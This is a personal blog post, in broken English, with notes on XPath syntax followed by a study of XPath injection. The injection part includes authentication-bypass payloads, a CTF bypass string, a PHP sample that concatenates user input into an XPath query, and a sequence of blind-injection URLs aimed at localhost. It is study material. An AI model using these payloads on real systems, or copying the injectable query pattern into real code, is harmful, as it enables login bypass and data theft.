<!DOCTYPE html>
<html class="has-navbar-fixed-top">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
<title>了解Xpath - Threezh1&#39;s blog</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.css">




<meta name="description" content="Share learn & Share life.">



<meta name="keywords" content="Threezh1">



    <meta name="description" content="Learn : http://www.w3school.com.cn/xpath/index.asp Simple noteXpath is a languaga to find information in XML. There are knowledge too much, I don&amp;#x2019;t want to copy. Chose node:">
<meta name="keywords" content="Xpath">
<meta property="og:type" content="article">
<meta property="og:title" content="了解Xpath">
<meta property="og:url" content="http://yoursite.com/2019/01/01/XPath/index.html">
<meta property="og:site_name" content="Threezh1&#39;s blog">
<meta property="og:description" content="Learn : http://www.w3school.com.cn/xpath/index.asp Simple noteXpath is a languaga to find information in XML. There are knowledge too much, I don&amp;#x2019;t want to copy. Chose node:">
<meta property="og:locale" content="Chinese">
<meta property="og:updated_time" content="2020-02-12T14:06:02.539Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="了解Xpath">
<meta name="twitter:description" content="Learn : http://www.w3school.com.cn/xpath/index.asp Simple noteXpath is a languaga to find information in XML. There are knowledge too much, I don&amp;#x2019;t want to copy. Chose node:">





<link rel="icon" href="/favicon.png">


<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Ovo|Source+Code+Pro">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/bulma/0.6.2/css/bulma.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/css/justifiedGallery.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css">

<link rel="stylesheet" href="/css/style.css">

<script defer src="//use.fontawesome.com/releases/v5.0.8/js/all.js"></script>


    
    
    
    
    
    
    
    
    


</head>
<body>
    
<nav class="navbar is-transparent is-fixed-top navbar-main" role="navigation" aria-label="main navigation">
    <div class="container">
        <div class="navbar-brand">
            <a class="navbar-item navbar-logo" href="/">
                
                <img src="/images/logo.png" alt height="28">
                
            </a>
            <div class="navbar-burger">
                <span></span>
                <span></span>
                <span></span>
            </div>
        </div>
        
        <div class="navbar-menu navbar-start">
            
            <a class="navbar-item " href="/archives">归档</a>
            
            <a class="navbar-item " href="/Projects">项目</a>
            
            <a class="navbar-item " href="/Life">生活</a>
            
            <a class="navbar-item " href="/Photography">摄影</a>
            
            <a class="navbar-item " href="/about">关于</a>
            
            <a class="navbar-item " href="http://119.3.219.188/">Threeday</a>
            
        </div>
        
        <div class="navbar-menu navbar-end">
            
            <a class="navbar-item search" title="Buscar" href="javascript:;">
                <i class="fas fa-search"></i>
            </a>
            
            
            
            <a class="navbar-item" title="GitHub" href="https://github.com/Threezh1">
                
                <i class="fab fa-github"></i>
                
            </a>
               
            
        </div>
    </div>
</nav>

    <section class="section">
    <div class="container">
    <article class="article content gallery" itemscope itemprop="blogPost">
    <h1 class="article-title is-size-3 is-size-4-mobile" itemprop="name">
        
            了解Xpath
        
    </h1>
    <div class="article-meta columns is-variable is-1 is-multiline is-mobile is-size-7-mobile">
        <span class="column is-narrow">
            <time datetime="2019-01-01T04:00:00.000Z" itemprop="datePublished">Jan 1 2019</time>
        </span>
        
        <span class="column is-narrow article-category">
            <i class="far fa-folder"></i>
            <a class="article-category-link" href="/categories/技术文章/">技术文章</a>
        </span>
        
        
        <span class="column is-narrow">
            
            
            5 minutes de lectura (Alrededor de 708 palabras)
        </span>
        
    </div>
    <div class="article-entry is-size-6-mobile" itemprop="articleBody">
    
        <p>Learn : <a href="http://www.w3school.com.cn/xpath/index.asp" target="_blank" rel="noopener">http://www.w3school.com.cn/xpath/index.asp</a></p>
<h2 id="Simple-note"><a href="#Simple-note" class="headerlink" title="Simple note"></a>Simple note</h2><p>Xpath is a languaga to find information in XML.</p>
<p>There are knowledge too much, I don&#x2019;t want to copy.</p>
<p>Chose node:<br><a id="more"></a></p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">bookstore		chose all children_parameters.</span><br><span class="line">/bookstore		chose root element bookstore.</span><br><span class="line">/bookstore/book	chose all children_paremeters named &quot;root&quot; of bookstore.</span><br><span class="line">//book 			chose all children_parameters no matter where they are.</span><br><span class="line">bookstore//book chose all children_paremeters named &quot;root&quot; of bookstore no matter where they are.</span><br><span class="line">//@lang 		chose all attribute named &quot;lang&quot;.</span><br><span class="line"></span><br><span class="line">/bookstore/book[1]</span><br><span class="line">/bookstore/book[last()]</span><br><span class="line">/bookstore/book[last()-1]</span><br><span class="line">/bookstore/book[position()&lt;3]</span><br><span class="line">//title[@lang]</span><br><span class="line">//title[@lang=&apos;eng&apos;]</span><br><span class="line">/bookstore/book[price&gt;35.00]</span><br><span class="line">/bookstore/book[price&gt;35.00]/title</span><br><span class="line"></span><br><span class="line">*		ALL node.</span><br><span class="line">@*		ALL node which have any attribute.</span><br><span class="line">node()	ALL type of node.</span><br><span class="line"></span><br><span class="line">//book/title | //book/price</span><br><span class="line">//title | //price</span><br><span class="line">/bookstore/book/title | //price</span><br></pre></td></tr></table></figure>

<p>USE:</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">var xmlDoc=new XMLHttpRequest()</span><br><span class="line"></span><br><span class="line">Chose nodes:</span><br><span class="line">IE : xmlDoc.selectNodes(xpath);</span><br><span class="line">Other : xmlDoc.evaluate(xpath, xmlDoc, null, XPathResult.ANY_TYPE,null);</span><br></pre></td></tr></table></figure>

<h2 id="XPath-Injection"><a href="#XPath-Injection" class="headerlink" title="XPath Injection"></a>XPath Injection</h2><p>A example:</p>
<figure class="highlight xml hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-tag">&lt;<span class="hljs-name">users</span>&gt;</span></span><br><span class="line">     <span class="hljs-tag">&lt;<span class="hljs-name">user</span>&gt;</span></span><br><span class="line">         <span class="hljs-tag">&lt;<span class="hljs-name">firstname</span>&gt;</span>Ben<span class="hljs-tag">&lt;/<span class="hljs-name">firstname</span>&gt;</span></span><br><span class="line">         <span class="hljs-tag">&lt;<span class="hljs-name">lastname</span>&gt;</span>Elmore<span class="hljs-tag">&lt;/<span class="hljs-name">lastname</span>&gt;</span></span><br><span class="line">         <span class="hljs-tag">&lt;<span class="hljs-name">loginID</span>&gt;</span>abc<span class="hljs-tag">&lt;/<span class="hljs-name">loginID</span>&gt;</span></span><br><span class="line">         <span class="hljs-tag">&lt;<span class="hljs-name">password</span>&gt;</span>test123<span class="hljs-tag">&lt;/<span class="hljs-name">password</span>&gt;</span></span><br><span class="line">     <span class="hljs-tag">&lt;/<span class="hljs-name">user</span>&gt;</span></span><br><span class="line">     <span class="hljs-tag">&lt;<span class="hljs-name">user</span>&gt;</span></span><br><span class="line">         <span class="hljs-tag">&lt;<span class="hljs-name">firstname</span>&gt;</span>Shlomy<span class="hljs-tag">&lt;/<span class="hljs-name">firstname</span>&gt;</span></span><br><span class="line">         <span class="hljs-tag">&lt;<span class="hljs-name">lastname</span>&gt;</span>Gantz<span class="hljs-tag">&lt;/<span class="hljs-name">lastname</span>&gt;</span></span><br><span class="line">         <span class="hljs-tag">&lt;<span class="hljs-name">loginID</span>&gt;</span>xyz<span class="hljs-tag">&lt;/<span class="hljs-name">loginID</span>&gt;</span></span><br><span class="line">         <span class="hljs-tag">&lt;<span class="hljs-name">password</span>&gt;</span>123test<span class="hljs-tag">&lt;/<span class="hljs-name">password</span>&gt;</span></span><br><span class="line">     <span class="hljs-tag">&lt;/<span class="hljs-name">user</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>A website use XML to store the username and password. There is his normal query statement:</p>
<p>Query basic statement:</p>
<p><code>//user/user[loginID/text()=&apos;abc&apos; and password/text()=&apos;test123&apos;]</code></p>
<p>Only if loginID and password is correct the user can get the result.</p>
<p>If Input loginID and password = <code>&apos;&apos; or 1=1</code> , the hacker can bypass the veryfication.</p>
<p><code>//users/user[LoginID/text()=&apos;&apos;or 1=1 and password/text()=&apos;&apos;or 1=1]</code></p>
<p>So, XPath injection just like SQL, try to use some evil statement to get all content in XML.</p>
<h3 id="Practice"><a href="#Practice" class="headerlink" title="Practice"></a>Practice</h3><h4 id="01"><a href="#01" class="headerlink" title="01"></a>01</h4><p>Use the Reference 1 to practice:</p>
<p>Request = <a href="http://localhost/test.php?name=admin&apos;" target="_blank" rel="noopener">http://localhost/test.php?name=admin&apos;</a> or &#x2018;1&#x2019;=&#x2019;1&amp;pwd</p>
<p>xpath=<code>/root/users/user[username/text()=&apos;admin&apos; or &apos;1&apos;=&apos;1&apos; and password/text()=&apos;d41d8cd98f00b204e9800998ecf8427e&apos;]</code></p>
<p>If you don&#x2019;t know the username, you can use tow &#x201C;or&#x201D; to bypass the verification logic.</p>
<p><code>http://localhost/test.php?name=fake&apos; or &apos;1&apos;or&apos;1&amp;pwd=fake</code></p>
<p>It will return all username.</p>
<h4 id="02"><a href="#02" class="headerlink" title="02"></a>02</h4><p>This is a CTF.</p>
<p>It filter all sql injection statement, So we should use xpath to inject.</p>
<p>This is important statement: <code>$query=&quot;user/username[@name=&apos;&quot;.$user.&quot;&apos;]&quot;;</code></p>
<p>We can structure <code>user=&apos;]//*|anyword[</code></p>
<p>First , we close the [] and then we use <code>//*</code> to get all username.</p>
<h4 id="03"><a href="#03" class="headerlink" title="03"></a>03</h4><p>A example of use XPath with PHP:</p>
<figure class="highlight xml hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-tag">&lt;<span class="hljs-name">peo</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&apos;vk&apos;</span>&gt;</span></span><br><span class="line">        <span class="hljs-tag">&lt;<span class="hljs-name">subject</span>&gt;</span></span><br><span class="line">                <span class="hljs-tag">&lt;<span class="hljs-name">foo</span>&gt;</span>english<span class="hljs-tag">&lt;/<span class="hljs-name">foo</span>&gt;</span></span><br><span class="line">                <span class="hljs-tag">&lt;<span class="hljs-name">score</span>&gt;</span>100<span class="hljs-tag">&lt;/<span class="hljs-name">score</span>&gt;</span></span><br><span class="line">        <span class="hljs-tag">&lt;/<span class="hljs-name">subject</span>&gt;</span></span><br><span class="line">        <span class="hljs-tag">&lt;<span class="hljs-name">subject</span>&gt;</span></span><br><span class="line">                <span class="hljs-tag">&lt;<span class="hljs-name">foo</span>&gt;</span>chinese<span class="hljs-tag">&lt;/<span class="hljs-name">foo</span>&gt;</span></span><br><span class="line">                <span class="hljs-tag">&lt;<span class="hljs-name">score</span>&gt;</span>100<span class="hljs-tag">&lt;/<span class="hljs-name">score</span>&gt;</span></span><br><span class="line">        <span class="hljs-tag">&lt;/<span class="hljs-name">subject</span>&gt;</span></span><br><span class="line">        <span class="hljs-tag">&lt;<span class="hljs-name">password</span>&gt;</span>vk123<span class="hljs-tag">&lt;/<span class="hljs-name">password</span>&gt;</span></span><br><span class="line"><span class="hljs-tag">&lt;/<span class="hljs-name">peo</span>&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="hljs-meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">if</span> (file_exists(<span class="hljs-string">&apos;score.xml&apos;</span>)){</span><br><span class="line">        $xml = simplexml_load_file(<span class="hljs-string">&apos;score.xml&apos;</span>);  <span class="hljs-comment">//&#x83B7;&#x53D6;xml&#x6587;&#x4EF6;&#x91CC;&#x9762;&#x7684;&#x6570;&#x636E;</span></span><br><span class="line">        <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">&apos;user&apos;</span>])){</span><br><span class="line">                $user = $_GET[<span class="hljs-string">&apos;user&apos;</span>];</span><br><span class="line"></span><br><span class="line">                <span class="hljs-comment">//&#x6784;&#x9020;&#x8BED;&#x53E5;</span></span><br><span class="line">                $en_scr = <span class="hljs-string">&quot;//peo[@name=&apos;{$user}&apos;]/subject[contains(foo, &apos;english&apos;)]/score&quot;</span>;</span><br><span class="line">                $ch_scr = <span class="hljs-string">&quot;//peo[@name=&apos;{$user}&apos;]/subject[contains(foo, &apos;chinese&apos;)]/score&quot;</span>;</span><br><span class="line">                $en_qu = $xml -&gt; xpath($en_scr);</span><br><span class="line">                $ch_qu = $xml -&gt; xpath($ch_scr);</span><br><span class="line">                <span class="hljs-keyword">foreach</span> ($en_qu <span class="hljs-keyword">as</span> $key =&gt; $value) {</span><br><span class="line">                        <span class="hljs-keyword">echo</span> $user.<span class="hljs-string">&apos;:&lt;br&gt;english is &apos;</span>.$value;</span><br><span class="line">                }</span><br><span class="line">                <span class="hljs-keyword">foreach</span> ($ch_qu <span class="hljs-keyword">as</span> $key =&gt; $value) {</span><br><span class="line">                        <span class="hljs-keyword">echo</span> <span class="hljs-string">&apos;&lt;br&gt;&apos;</span>.<span class="hljs-string">&apos;chinese is &apos;</span>.$value;</span><br><span class="line">                }</span><br><span class="line">        }<span class="hljs-keyword">else</span>{</span><br><span class="line">                <span class="hljs-keyword">echo</span> <span class="hljs-string">&apos;only have three user: vk, tom, helen.&apos;</span>;</span><br><span class="line">        }</span><br><span class="line">}</span><br><span class="line"><span class="hljs-meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>$en_scr = &quot;//peo[@name=&apos;{$user}&apos;]/subject[contains(foo, &apos;english&apos;)]/score&quot;;</code></p>
<p>Get the peo of the attribute name=user and then find the score of the child element whose foo is english in the subject.</p>
<p>Bypass: <code>name=tom}&apos;] | //* | //*[&apos;{</code></p>
<h4 id="04"><a href="#04" class="headerlink" title="04"></a>04</h4><p>XPath blind injection:</p>
<p>Because I haven&#x2019;t the enough example, so I just learn the thought of how to use it in easy way.</p>
<p>Use the code of example 01.</p>
<ol>
<li>Judge the nodes&#x2019; number of root.</li>
</ol>
<p><code>127.0.0.1/xpath/index.php?name=1&apos; or count(/*)=1 or &apos;1&apos;=&apos;1&amp;pwd=fake</code></p>
<ol start="2">
<li>Guess the first node.</li>
</ol>
<p><code>127.0.0.1/xpath/index.php?name=1&apos; or substring(name(/*[position()=1]),1,1)=&apos;r&apos; or &apos;1&apos;=&apos;1&amp;pwd=fake</code></p>
<p><code>127.0.0.1/xpath/index.php?name=1&apos; or substring(name(/*[position()=1]),2,1)=&apos;o&apos; or &apos;1&apos;=&apos;1&amp;pwd=fake</code></p>
<p>&#x2026;</p>
<p>result : root</p>
<ol start="3">
<li>Judge the number of next node of root:</li>
</ol>
<p><code>127.0.0.1/xpath/index.php?name=1&apos; or count(/root/*)=2 or &apos;1&apos;=&apos;1&amp;pwd=fake</code></p>
<ol start="4">
<li>Guess the net node of root:</li>
</ol>
<p><code>127.0.0.1/xpath/index.php?name=1&apos; or substring(name(/root/*[position()=1]),1,1)=&apos;u&apos; or &apos;1&apos;=&apos;1&amp;pwd=fake</code></p>
<p><code>127.0.0.1/xpath/index.php?name=1&apos; or substring(name(/root/*[position()=2]),1,1)=&apos;s&apos; or &apos;1&apos;=&apos;1&amp;pwd=fake</code></p>
<p>&#x2026;</p>
<p>result: users,secret</p>
<p>Guess the value of username which id = 1:</p>
<p><code>127.0.0.1/xpath/index.php?name=1&apos; or substring(/root/users/user[id=1]/username,1,1)=&apos;a&apos; or &apos;1&apos;=&apos;1&amp;pwd=fake</code></p>
<p>&#x2026;</p>
<p>result: admin</p>
<h2 id="DIG"><a href="#DIG" class="headerlink" title="DIG"></a>DIG</h2><p>If a website use XML to store privacy information and use XPath to control it and there haven&#x2019;t waf to statement of input. So there is a XPath injection.</p>
<p>A lack of example. Maybe the vulunery is difficult to meet.</p>
<h2 id="Tips"><a href="#Tips" class="headerlink" title="Tips"></a>Tips</h2><p>or and = |</p>
<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h2><ul>
<li><a href="https://www.cnblogs.com/backlion/p/8554749.html" target="_blank" rel="noopener">xpath&#x6CE8;&#x5165;&#x8BE6;&#x89E3;</a></li>
</ul>

    
    </div>
    
    <div class="columns is-variable is-1 is-multiline is-mobile">
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/Xpath/">#Xpath</a></span>
    
    </div>
    
    
    <div class="columns is-mobile is-multiline article-nav">
        <span class="column is-12-mobile is-half-desktop  article-nav-prev">
            
            <a href="/2019/01/01/HPP_Subdomain_takeover/">了解HPP</a>
            
        </span>
        <span class="column is-12-mobile is-half-desktop  article-nav-next">
            
            <a href="/2019/01/01/XXE_Note/">了解XML</a>
            
        </span>
    </div>
    
</article>




    </div>
</section>
    <footer class="footer">
    <div class="container">
        <div class="columns content">
            <div class="column is-narrow has-text-centered">
                &copy; 2020 Threezh1&nbsp;
                Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> & <a href="http://github.com/ppoffice/hexo-theme-minos">Minos</a>
            </div>
            <div class="column is-hidden-mobile"></div>

            
            <div class="column is-narrow">
                <div class="columns is-mobile is-multiline is-centered">
                
                    
                <a class="column is-narrow has-text-black" title="GitHub" href="https://github.com/Threezh1">
                    
                    GitHub
                    
                </a>
                
                </div>
            </div>
            
            
        </div>
    </div>
</footer>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script>

<!-- test if the browser is outdated -->
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.js"></script>
<script>
    $(document).ready(function () {
        // plugin function, place inside DOM ready function
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        })
    });
</script>

<script>
    window.FontAwesomeConfig = {
        searchPseudoElements: true
    }
    moment.locale("chinese");
</script>


    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script>
    MathJax.Hub.Config({
        "HTML-CSS": {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
</script>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.css" integrity="sha384-9eLZqc9ds8eNjO3TmqPeYcDj8n+Qfa4nuSiGYa6DjLNcv9BtN69ZIulL9+8CqC9Y" crossorigin="anonymous">
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.js" integrity="sha384-K3vbOmF2BtaVai+Qk37uypf7VrgBubhQreNQe9aGsz9lB63dIFiQVlJbr92dw2Lx" crossorigin="anonymous"></script>
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/contrib/auto-render.min.js" integrity="sha384-kmZOZB5ObwgQnS/DuDg6TScgOiWWBiVt0plIRkZCmE6rDZGrEOQeHM5PcHi+nyqe" crossorigin="anonymous" onload="renderMathInElement(document.body);"></script>

<script>
document.addEventListener("DOMContentLoaded", function() {
    renderMathInElement(document.body, {
        // ...options...
    });
});
</script>

    
    
<script src="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/js/lightgallery-all.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/js/jquery.justifiedGallery.min.js"></script>
<script>
    (function ($) {
        $(document).ready(function () {
            if (typeof($.fn.lightGallery) === 'function') {
                $('.article.gallery').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof($.fn.justifiedGallery) === 'function') {
                $('.justified-gallery').justifiedGallery();
            }
        });
    })(jQuery);
</script>

    
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.0/clipboard.min.js"></script>
    <style>
        .hljs {
            position: relative;
        }

        .hljs .clipboard-btn {
            float: right;
            color: #9a9a9a;
            background: none;
            border: none;
            cursor: pointer;
        }

        .hljs .clipboard-btn:hover {
          color: #8a8a8a;
        }

        .hljs > .clipboard-btn {
            display: none;
            position: absolute;
            right: 4px;
            top: 4px;
        }

        .hljs:hover > .clipboard-btn {
            display: inline;
        }

        .hljs > figcaption > .clipboard-btn {
            margin-right: 4px;
        }
    </style>
    <script>
      $(document).ready(function () {
        $('figure.hljs').each(function(i, figure) {
          var codeId = 'code-' + i;
          var code = figure.querySelector('.code');
          var copyButton = $('<button>Copy <i class="far fa-clipboard"></i></button>');
          code.id = codeId;
          copyButton.addClass('clipboard-btn');
          copyButton.attr('data-clipboard-target-id', codeId);

          var figcaption = figure.querySelector('figcaption');

          if (figcaption) {
            figcaption.append(copyButton[0]);
          } else {
            figure.prepend(copyButton[0]);
          }
        })

        var clipboard = new ClipboardJS('.clipboard-btn', {
          target: function(trigger) {
            return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
          }
        });
        clipboard.on('success', function(e) {
          e.clearSelection();
        })
      })
    </script>

    


<script src="/js/script.js"></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-mask"></div>
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="Escribe algo...">
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: 'Posts',
                PAGES: 'Páginas',
                CATEGORIES: 'Categorías',
                TAGS: 'Tags',
                UNTITLED: '(Sin título)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js"></script>
    
</body>
</html>